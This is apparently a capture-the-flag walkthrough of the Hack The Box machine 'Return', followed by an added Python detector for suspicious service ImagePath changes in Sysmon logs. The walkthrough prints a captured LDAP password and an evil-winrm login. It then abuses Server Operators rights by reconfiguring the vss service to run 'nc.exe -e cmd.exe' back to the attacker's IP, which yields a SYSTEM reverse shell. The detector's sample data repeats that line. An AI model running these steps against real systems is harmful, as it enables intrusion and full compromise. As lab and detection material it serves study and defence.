neoh main ~/HTB/return sudo nmap -sSCV -p- -T4 10.10.11.108 -oN nmap.md
Starting Nmap 7.80 ( https://nmap.org ) at 2021-11-14 11:35 EST
Nmap scan report for 10.10.11.108
Host is up (0.025s latency).
Not shown: 65510 closed ports
PORT STATE SERVICE VERSION
53/tcp open domain?
| fingerprint-strings:
| DNSVersionBindReqTCP:
| version
|_ bind
80/tcp open http Microsoft IIS httpd 10.0
| http-methods:
|_ Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
|_http-title: HTB Printer Admin Panel
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2021-11-14 17:08:37Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: return.local0., Site: Default-First-Site-Name)
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: return.local0., Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
9389/tcp open mc-nmf .NET Message Framing
47001/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
49664/tcp open msrpc Microsoft Windows RPC
49665/tcp open msrpc Microsoft Windows RPC
49666/tcp open msrpc Microsoft Windows RPC
49667/tcp open msrpc Microsoft Windows RPC
49671/tcp open msrpc Microsoft Windows RPC
49674/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
49675/tcp open msrpc Microsoft Windows RPC
49679/tcp open msrpc Microsoft Windows RPC
49682/tcp open msrpc Microsoft Windows RPC
49694/tcp open msrpc Microsoft Windows RPC
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port53-TCP:V=7.80%I=7%D=11/14%Time=61913AFD%P=x86_64-pc-linux-gnu%r(DNS
SF:VersionBindReqTCP,20,"\0\x1e\0\x06\x81\x04\0\x01\0\0\0\0\0\0\x07version
SF:\x04bind\0\0\x10\0\x03");
Service Info: Host: PRINTER; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
|_clock-skew: 32m28s
| smb2-security-mode:
| 2.02:
|_ Message signing enabled and required
| smb2-time:
| date: 2021-11-14T17:10:58
|_ start_date: N/A
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 299.94 seconds
Nmap reveals a lot of open ports on this machine. My attention is drawn to the SMB server. NTLM relay against it is not possible since message signing is required, but I'll still take a look to see if there is anything interesting.
neoh main ~/HTB/return smbclient -L \\\\10.10.11.108\\
Enter WORKGROUP\neoh's password:
Anonymous login successful
Sharename Type Comment
--------- ---- -------
SMB1 disabled -- no workgroup available
Unfortunately there is nothing available over the anonymous/guest login. Let's check the website running on port 80.


First I’ll start my “server” using netcat.
neoh main ~/HTB/return sudo nc -nlvp 389
[sudo] password for neoh:
Listening on 0.0.0.0 389

So we get a hit on our listener!
neoh main ~/HTB/return sudo nc -nlvp 389
[sudo] password for neoh:
Listening on 0.0.0.0 389
Connection received on 10.10.11.108 64874
0*`%return\svc-printer�
1edFg43012!!
Now we have a username and a password. Recall that nmap revealed the WinRM port (5985) is open. Since we have credentials, we can use evil-winrm to log in to the machine.
neoh main ~/HTB/return evil-winrm -i 10.10.11.108 -u svc-printer
Enter Password:
Evil-WinRM shell v3.3
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\svc-printer\Documents> whoami
return\svc-printer
*Evil-WinRM* PS C:\Users\svc-printer\Documents>
*Evil-WinRM* PS C:\Users\svc-printer\Documents> net user svc-printer
User name svc-printer
Full Name SVCPrinter
Comment Service Account for Printer
User's comment
Country/region code 000 (System Default)
Account active Yes
Account expires Never
Password last set 5/26/2021 12:15:13 AM
Password expires Never
Password changeable 5/27/2021 12:15:13 AM
Password required Yes
User may change password Yes
Workstations allowed All
Logon script
User profile
Home directory
Last logon 5/26/2021 12:39:29 AM
Logon hours allowed All
Local Group Memberships *Print Operators *Remote Management Use
*Server Operators
Global Group memberships *Domain Users
The command completed successfully.
Local group enumeration revealed that svc-printer is part of the Server Operators group, which allows its members to manage services on the system. We are allowed to start, stop and reconfigure services, and with that in mind I can upload netcat.exe and run it as a service to get an Administrator reverse shell. Let's try that.
*Evil-WinRM* PS C:\Users\svc-printer\Documents> upload /home/neoh/HTB/return/nc.exe
Info: Uploading /home/neoh/HTB/return/nc.exe to C:\Users\svc-printer\Documents\nc.exe
Data: 51488 bytes of 51488 bytes copied
Info: Upload successful!
*Evil-WinRM* PS C:\Users\svc-printer\Documents>
Then I start a new listener on my machine and change the binary path of the vss service.
neoh main ~/HTB/return nc -nvlp 4444
Listening on 0.0.0.0 4444
*Evil-WinRM* PS C:\Users\svc-printer\Documents> sc.exe config vss binPath="C:\Users\svc-printer\Documents\nc.exe -e cmd.exe 10.10.14.13 4444"
[SC] ChangeServiceConfig SUCCESS
*Evil-WinRM* PS C:\Users\svc-printer\Documents>
The next step is to stop and start the service, which should give us a shell.
*Evil-WinRM* PS C:\Users\svc-printer\Documents> sc.exe stop vss
[SC] ControlService FAILED 1062:
The service has not been started.
*Evil-WinRM* PS C:\Users\svc-printer\Documents> sc.exe start vss
neoh main ~/HTB/return nc -nvlp 4444
Listening on 0.0.0.0 4444
Connection received on 10.10.11.108 65500
Microsoft Windows [Version 10.0.17763.107]
(c) 2018 Microsoft Corporation. All rights reserved.
C:\Windows\system32>whoami
whoami
nt authority\system
Rooted!
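From the defender's side, the sc.exe config change above is a write to the service's ImagePath value under HKLM\System\CurrentControlSet\Services, which Sysmon records as Event ID 13 (RegistryEvent: Value Set). The following added example (not part of the original writeup) runs simple detection logic over constructed Sysmon records: the field names follow Sysmon's schema, the sample values are made up, and only the last one mirrors the binPath written here.

```python
import re
from typing import Dict, List, Optional

# Constructed Sysmon Event ID 13 (RegistryEvent: Value Set) records. Field names
# follow Sysmon's schema; the values are made up, the last one mirroring the
# ImagePath that "sc.exe config vss binPath=..." wrote in the walkthrough.
SAMPLE_EVENTS: List[Dict[str, str]] = [
    {"EventID": "13", "TargetObject": r"HKLM\System\CurrentControlSet\Services\W32Time\ImagePath",
     "Details": r"%SystemRoot%\system32\svchost.exe -k LocalService"},
    {"EventID": "13", "TargetObject": r"HKLM\System\CurrentControlSet\Services\Spooler\Start",
     "Details": "DWORD (0x00000002)"},
    {"EventID": "13", "TargetObject": r"HKLM\System\CurrentControlSet\Services\vss\ImagePath",
     "Details": r"C:\Users\svc-printer\Documents\nc.exe -e cmd.exe 10.10.14.13 4444"},
]

IMAGEPATH_RE = re.compile(r"\\Services\\(?P<svc>[^\\]+)\\ImagePath$", re.IGNORECASE)
# Locations from which legitimate service binaries are expected to run.
TRUSTED_DIRS = ("c:\\windows\\", "c:\\program files\\", "c:\\program files (x86)\\")
SHELL_RE = re.compile(r"\b(cmd|powershell)\.exe\b", re.IGNORECASE)
IP_PORT_RE = re.compile(r"\b\d{1,3}(?:\.\d{1,3}){3}\b\s+\d{1,5}\b")


def executable_of(image_path: str) -> str:
    """Return the executable part of an ImagePath (quoted or bare), lower-cased
    and with the environment variables service paths commonly use expanded."""
    value = image_path.strip()
    exe = value[1:value.find('"', 1)] if value.startswith('"') else value.split(" ", 1)[0]
    return exe.lower().replace("%systemroot%", "c:\\windows").replace("%windir%", "c:\\windows")


def analyse_event(event: Dict[str, str]) -> Optional[Dict[str, object]]:
    """Return a finding for a suspicious ImagePath write, or None if benign."""
    match = IMAGEPATH_RE.search(event.get("TargetObject", ""))
    if event.get("EventID") != "13" or not match:
        return None  # not a service ImagePath change (e.g. Start type edits)
    details = event.get("Details", "")
    binary = executable_of(details)
    reasons = []
    if not binary.startswith(TRUSTED_DIRS):
        reasons.append("binary outside trusted system directories")
    if SHELL_RE.search(details) and not binary.endswith(("cmd.exe", "powershell.exe")):
        reasons.append("a shell is passed as an argument to the binary")
    if IP_PORT_RE.search(details):
        reasons.append("command line contains an IP address and port")
    if not reasons:
        return None
    return {"service": match.group("svc"), "image_path": details, "reasons": reasons}


def scan(events: List[Dict[str, str]]) -> List[Dict[str, object]]:
    """Run the ImagePath check over a batch of Sysmon records."""
    return [f for f in map(analyse_event, events) if f is not None]
```

Only the vss record is flagged, on all three counts; the svchost entry and the Start-type edit pass through untouched.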